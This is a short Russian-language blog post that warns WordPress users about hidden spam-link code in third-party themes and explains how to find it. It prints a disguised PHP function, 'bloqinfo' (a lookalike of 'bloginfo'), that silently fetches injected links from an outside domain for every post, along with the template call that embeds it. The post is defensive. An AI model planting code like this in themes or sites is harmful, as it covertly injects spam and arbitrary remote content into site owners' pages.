Рассмотрим несколько способов удаления/внедрения скрытых ссылок в шаблоны WordPress. Объяснять чем это грозит, думаю не стоит. Двигаться будем от того, что посложней к тому, что попроще.

И так. Вариант первый. Наиболее изощрённый. Перед установкой новой темы удостоверьтесь, чтобы в файле functions.php не было подобного кода:

function bloqinfo($wp_id){
  static $wp_count = 0;

  if ($wp_count == 0) {
    $wp_count++;
  return @file_get_contents('http://wpru.ru/aksimet.php?id='.$wp_id.'&m=09');
 /*
  * http://wpru.ru, - в данном примере отсюда генерируются ссылки,
  * домен может быть любой.
  * @ перед file_get_contents, - подавляет вывод ошибок, конспирация;
  * в качестве входных данных поступает ID поста
  */
    }
}

Разумеется, функция может называться и не bloqinfo, а как-то по-другому. Располагаться и не в functions.php, быть зашифрована и т.д. и т.п. Но суть от этого не меняется, — с этим у вас обязательно будут различные «левые» ссылки буквально на каждой странице вашего блога.

Также внимательно проверьте все файлы WordPress-шаблона на наличие вызова bloqinfo в циклах вывода содержимого, используя поиск по содержимому файлов в каком-нибудь текстовом редакторе типа Notepad++. Не забудьте сохранить в UTF-8 без BOM.

<?php
if (have_posts()) :
   while (have_posts()) : the_post(); ?><?=bloqinfo($post->ID) ?>
  <!-- как здесь,например -->
...
?>

Кстати, как похожи bloginfo (выводит различную полезную информацию о блоге, Кодекс почитайте) и bloqinfo (буквально «гадит» на ваш сайт), не перепутайте. Не удивляйтесь, что помимо «линкопомойки» вы можете получить любой другой «вредный» код.

Также отмечу, что при включенном JavaScript вы ничего на своих страничках не увидите. Всё «интересное» возможно будет скрыто с помощью JS. По крайней мере на тот момент, когда я столкнулся с этим впервые было так.

Источник:  sooource.net